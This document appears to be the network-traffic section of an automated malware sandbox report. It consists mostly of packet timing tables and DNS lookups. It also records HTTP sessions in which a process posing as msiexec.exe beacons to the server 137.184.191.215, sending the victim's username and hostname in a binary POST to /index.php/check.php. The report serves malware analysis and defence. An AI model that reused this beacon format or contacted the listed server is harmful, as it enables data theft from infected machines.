                                        Oct 2, 2024 07:19:47.483918905 CEST5909780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:47.488778114 CEST8059097137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:49.998955965 CEST8059097137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:49.999345064 CEST8059097137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:49.999356985 CEST8059097137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:49.999461889 CEST5909780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:49.999979019 CEST5909780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:50.000569105 CEST8059097137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:50.000629902 CEST5909780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:50.005716085 CEST8059097137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:50.164522886 CEST5909880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:50.170619011 CEST8059098137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:50.170706987 CEST5909880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:50.173902035 CEST5909880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:50.178757906 CEST8059098137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:50.178821087 CEST5909880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:50.183600903 CEST8059098137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:53.439418077 CEST8059098137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:53.439882994 CEST8059098137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:53.439892054 CEST8059098137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:53.439974070 CEST5909880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:53.440143108 CEST5909880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:53.441008091 CEST8059098137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:53.441016912 CEST8059098137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:53.441020966 CEST8059098137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:53.441025972 CEST8059098137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:53.441067934 CEST5909880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:53.441103935 CEST5909880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:53.441103935 CEST5909880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:53.441103935 CEST5909880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:53.582046032 CEST5909980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:53.587034941 CEST8059099137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:53.587121010 CEST5909980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:53.589097977 CEST5909980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:53.593882084 CEST8059099137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:53.593930006 CEST5909980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:53.598933935 CEST8059099137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:56.225506067 CEST8059099137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:56.225925922 CEST8059099137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:56.225935936 CEST8059099137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:56.226079941 CEST5909980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:56.226201057 CEST5909980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:56.227020979 CEST8059099137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:56.227066994 CEST5909980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:56.227144003 CEST8059099137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:56.227186918 CEST5909980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:56.367279053 CEST5910080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:56.372215986 CEST8059100137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:56.372311115 CEST5910080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:56.374245882 CEST5910080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:56.379153967 CEST8059100137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:56.379219055 CEST5910080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:56.384228945 CEST8059100137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:59.054563999 CEST8059100137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:59.054970980 CEST8059100137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:59.055098057 CEST5910080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:59.055191040 CEST8059100137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:59.055269003 CEST5910080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:59.056109905 CEST8059100137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:59.056118011 CEST8059100137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:59.056169987 CEST5910080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:59.058414936 CEST5910080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:59.202685118 CEST5910180192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:59.208030939 CEST8059101137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:59.208127975 CEST5910180192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:59.209873915 CEST5910180192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:59.214770079 CEST8059101137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:19:59.214833975 CEST5910180192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:19:59.219872952 CEST8059101137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:01.879544020 CEST8059101137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:01.879966974 CEST8059101137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:01.879980087 CEST8059101137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:01.880033016 CEST5910180192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:01.881153107 CEST8059101137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:01.881207943 CEST5910180192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:01.883200884 CEST5910180192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:01.888020992 CEST8059101137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:02.274768114 CEST5910280192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:02.279658079 CEST8059102137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:02.279731989 CEST5910280192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:02.281871080 CEST5910280192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:02.286762953 CEST8059102137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:02.286811113 CEST5910280192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:02.292332888 CEST8059102137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:04.967272043 CEST8059102137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:04.967560053 CEST8059102137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:04.967570066 CEST8059102137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:04.967633009 CEST5910280192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:04.967820883 CEST5910280192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:04.968673944 CEST8059102137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:04.968683958 CEST8059102137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:04.968728065 CEST5910280192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:04.968736887 CEST5910280192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:05.109662056 CEST5910380192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:05.115096092 CEST8059103137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:05.115197897 CEST5910380192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:05.117207050 CEST5910380192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:05.122406006 CEST8059103137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:05.122471094 CEST5910380192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:05.127722025 CEST8059103137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:07.737092972 CEST8059103137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:07.737401009 CEST8059103137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:07.737412930 CEST8059103137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:07.737466097 CEST5910380192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:07.737730026 CEST5910380192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:07.738620996 CEST8059103137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:07.738694906 CEST5910380192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:07.743472099 CEST8059103137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:07.872776031 CEST5910480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:07.878206015 CEST8059104137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:07.878312111 CEST5910480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:07.880738020 CEST5910480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:07.886210918 CEST8059104137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:07.886271954 CEST5910480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:07.892029047 CEST8059104137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:10.514827013 CEST8059104137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:10.515367031 CEST8059104137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:10.515378952 CEST8059104137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:10.515443087 CEST5910480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:10.515625000 CEST5910480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:10.516489029 CEST8059104137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:10.516550064 CEST5910480192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:10.520356894 CEST8059104137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:10.653409004 CEST5910580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:10.658355951 CEST8059105137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:10.658432007 CEST5910580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:10.660384893 CEST5910580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:10.665195942 CEST8059105137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:10.665251017 CEST5910580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:10.671344042 CEST8059105137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:13.219569921 CEST8059105137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:13.219995975 CEST8059105137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:13.220007896 CEST8059105137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:13.220159054 CEST5910580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:13.220294952 CEST5910580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:13.221167088 CEST8059105137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:13.221216917 CEST5910580192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:13.225080967 CEST8059105137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:13.354036093 CEST5910680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:13.358856916 CEST8059106137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:13.358936071 CEST5910680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:13.361092091 CEST5910680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:13.365886927 CEST8059106137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:13.365953922 CEST5910680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:13.370779991 CEST8059106137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:16.036499023 CEST8059106137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:16.036878109 CEST8059106137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:16.036887884 CEST8059106137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:16.036940098 CEST5910680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:16.037158966 CEST5910680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:16.038016081 CEST8059106137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:16.038026094 CEST8059106137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:16.038077116 CEST5910680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:16.038077116 CEST5910680192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:16.183022022 CEST5910780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:16.188004971 CEST8059107137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:16.188088894 CEST5910780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:16.189989090 CEST5910780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:16.194768906 CEST8059107137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:16.194834948 CEST5910780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:16.199640036 CEST8059107137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:19.692133904 CEST8059107137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:19.692466974 CEST8059107137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:19.692480087 CEST8059107137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:19.692534924 CEST5910780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:19.693728924 CEST8059107137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:19.693739891 CEST8059107137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:19.693748951 CEST8059107137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:19.693762064 CEST8059107137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:19.693794966 CEST5910780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:19.693837881 CEST5910780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:19.696248055 CEST5910780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:19.696480989 CEST5910780192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:19.701374054 CEST8059107137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:19.852371931 CEST5910880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:19.857469082 CEST8059108137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:19.857548952 CEST5910880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:19.859668970 CEST5910880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:19.864407063 CEST8059108137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:19.864464998 CEST5910880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:19.869291067 CEST8059108137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:22.538747072 CEST8059108137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:22.539127111 CEST8059108137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:22.539135933 CEST8059108137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:22.539181948 CEST5910880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:22.539365053 CEST5910880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:22.540229082 CEST8059108137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:22.540236950 CEST8059108137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:22.540297985 CEST5910880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:22.540297985 CEST5910880192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:22.685108900 CEST5910980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:22.690910101 CEST8059109137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:22.691001892 CEST5910980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:22.693000078 CEST5910980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:22.698065042 CEST8059109137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:22.698157072 CEST5910980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:22.974946022 CEST8059109137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:25.272121906 CEST8059109137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:25.272531986 CEST8059109137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:25.272542000 CEST8059109137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:25.272630930 CEST5910980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:25.272810936 CEST5910980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:25.273087978 CEST8059109137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:25.273098946 CEST8059109137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:25.273144960 CEST5910980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:25.275702953 CEST5910980192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:25.420613050 CEST5911080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:25.426137924 CEST8059110137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:25.426326990 CEST5911080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:25.428327084 CEST5911080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:25.433620930 CEST8059110137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:25.433687925 CEST5911080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:25.439588070 CEST8059110137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:28.120699883 CEST8059110137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:28.121135950 CEST8059110137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:28.121146917 CEST8059110137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:28.121263981 CEST5911080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:28.122340918 CEST8059110137.184.191.215192.168.2.4
                                        Oct 2, 2024 07:20:28.124731064 CEST5911080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:28.402703047 CEST5911080192.168.2.4137.184.191.215
                                        Oct 2, 2024 07:20:28.407682896 CEST8059110137.184.191.215192.168.2.4
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 2, 2024 07:18:22.771497965 CEST5743353192.168.2.41.1.1.1
                                        Oct 2, 2024 07:18:22.778239965 CEST53574331.1.1.1192.168.2.4
                                        Oct 2, 2024 07:18:24.759563923 CEST5889653192.168.2.41.1.1.1
                                        Oct 2, 2024 07:18:24.766527891 CEST53588961.1.1.1192.168.2.4
                                        Oct 2, 2024 07:18:51.722301960 CEST5354495162.159.36.2192.168.2.4
                                        Oct 2, 2024 07:18:52.206317902 CEST6305153192.168.2.41.1.1.1
                                        Oct 2, 2024 07:18:52.214292049 CEST53630511.1.1.1192.168.2.4
                                        Oct 2, 2024 07:19:04.025243998 CEST6169953192.168.2.41.1.1.1
                                        Oct 2, 2024 07:19:04.033066988 CEST53616991.1.1.1192.168.2.4
                                        Oct 2, 2024 07:19:05.189321995 CEST5090553192.168.2.41.1.1.1
                                        Oct 2, 2024 07:19:05.207438946 CEST53509051.1.1.1192.168.2.4
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Oct 2, 2024 07:18:22.771497965 CEST192.168.2.41.1.1.10xcdc5Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                        Oct 2, 2024 07:18:24.759563923 CEST192.168.2.41.1.1.10x5e67Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                        Oct 2, 2024 07:18:52.206317902 CEST192.168.2.41.1.1.10xbfcaStandard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                        Oct 2, 2024 07:19:04.025243998 CEST192.168.2.41.1.1.10xe283Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                        Oct 2, 2024 07:19:05.189321995 CEST192.168.2.41.1.1.10xc554Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Oct 2, 2024 07:18:22.778239965 CEST1.1.1.1192.168.2.40xcdc5No error (0)drive.google.com172.217.18.14A (IP address)IN (0x0001)false
                                        Oct 2, 2024 07:18:24.766527891 CEST1.1.1.1192.168.2.40x5e67No error (0)drive.usercontent.google.com142.250.186.33A (IP address)IN (0x0001)false
                                        Oct 2, 2024 07:18:52.214292049 CEST1.1.1.1192.168.2.40xbfcaName error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                        Oct 2, 2024 07:19:04.033066988 CEST1.1.1.1192.168.2.40xe283No error (0)drive.google.com172.217.18.110A (IP address)IN (0x0001)false
                                        Oct 2, 2024 07:19:05.207438946 CEST1.1.1.1192.168.2.40xc554No error (0)drive.usercontent.google.com142.250.186.161A (IP address)IN (0x0001)false
                                        • drive.google.com
                                        • drive.usercontent.google.com
                                        • 137.184.191.215
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.459084137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:09.567332029 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 176
                                        Connection: close
                                        Oct 2, 2024 07:19:09.572345018 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: 'ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C9HeyQ
                                        Oct 2, 2024 07:19:12.302341938 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:10 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:12.302764893 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:19:12.302778006 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.459085137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:12.437366009 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 176
                                        Connection: close
                                        Oct 2, 2024 07:19:12.483647108 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: 'ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2CclqRP
                                        Oct 2, 2024 07:19:15.446930885 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:13 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
